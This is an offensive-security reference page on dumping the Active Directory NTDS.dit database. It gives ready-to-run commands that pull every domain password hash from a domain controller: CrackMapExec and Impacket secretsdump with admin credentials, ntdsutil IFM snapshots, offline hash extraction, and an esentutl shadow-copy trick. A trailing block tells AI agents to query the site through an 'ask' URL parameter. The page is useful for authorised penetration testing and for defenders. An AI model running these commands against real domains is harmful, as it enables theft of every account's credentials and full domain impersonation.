# NTDS

The NTDS.dit file (NTDS) is a database which stores confidential Active Directory information such as usernames, objects, groups, and password hashes. Once the NTDS.dit file has been retrieved, an attacker can effectively impersonate any member of the domain. This file is stored on domain controllers, meaning that full domain compromise has to occur in order to retrieve it.

### Exploitation

CrackMapExec and Impacket are  the easiest ways to remotely dump the NTDS.dit after Domain Administrator credentials have been obtained:

```bash
# CrackMapExec
crackmapexec smb -u $user -p $password -ntds 

# Impacket
impacket-secretsdump -just-dc-ntlm oasis/administrator@$dcip
```

Alternatively, [an attacker can dump the NTDS.dit manually](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration) if they have a shell on a Domain Controller:&#x20;

```bash
# Dump the NTDS
# It should be noted that this works on older machines when Secretsdump and vssadmin fail
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

# Dump the password hashes offline 
impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

# LOLBIN 
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\Windows\Tasks\ntds.dit
```

### References

{% embed url="<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ttp.parzival.sh/pentesting/infrastructure/active-directory/os-credential-dumping/ntds.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.